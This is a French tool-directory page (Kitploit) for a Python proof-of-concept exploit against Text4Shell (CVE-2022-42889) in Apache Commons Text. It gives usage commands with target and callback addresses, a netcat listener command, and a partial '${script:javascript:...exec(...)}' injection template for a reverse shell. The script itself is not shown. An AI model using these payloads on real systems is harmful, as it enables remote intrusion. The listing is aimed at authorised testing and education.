Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
text4shell-exploit — Un exploit personnalisé basé sur Python de type proof-of-concept (PoC) ciblant Text4Shell (CVE-2022-42889), une vulnérabilité critique d'exécution de code à distance dans Apache Commons Text versions < 1.10. | Kitploit
Outils/GitHubGitHub/syndicate27/text4shell-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

Un exploit personnalisé basé sur Python de type proof-of-concept (PoC) ciblant Text4Shell (CVE-2022-42889), une vulnérabilité critique d'exécution de code à distance dans Apache Commons Text versions < 1.10.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 1 anPas encore vérifié

text4shell-exploit

Un proof-of-concept (PoC) personnalisé basé sur Python ciblant Text4Shell (CVE-2022-42889), une vulnérabilité critique d'exécution de code à distance dans Apache Commons Text versions < 1.10. Ce PoC cible les applications Java vulnérables qui utilisent la classe StringSubstitutor avec l'interpolation activée, permettant d'injecter des expressions ${script:...} pour exécuter des commandes système arbitraires.

Dans ce PoC, l'exploitation est démontrée via le paramètre de requête data ; cependant, le nom du paramètre vulnérable peut varier selon l'implémentation. Les utilisateurs doivent adapter la charge utile et le chemin de la requête en fonction de la logique de l'application cible.

Avertissement : Ce PoC est fourni à des fins éducatives et de tests d'intrusion autorisés uniquement. Utilisez-le de manière responsable et sous votre propre responsabilité.

Description

Il s'agit d'un PoC personnalisé en Python3 pour la vulnérabilité Apache Commons Text connue sous le nom de Text4Shell (CVE-2022-42889). Il permet l'exécution de code à distance (RCE) via des interpolateurs non sécurisés lorsque l'entrée utilisateur est évaluée dynamiquement par StringSubstitutor.

Testé avec :

  • Apache Commons Text < 1.10.0
  • Applications Java utilisant l'interpolation ${script:...} à partir d'entrées non fiables

Utilisation

root@kitploit:~
python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Exemple

root@kitploit:~
python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Assurez-vous de configurer un écouteur sur votre machine d'attaque :

root@kitploit:~
nc -nlvp 4444

Logique du payload

Le script injecte :

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

Le reverse shell est envoyé via le paramètre /data à l'aide d'une requête POST.

Télécharger l’outil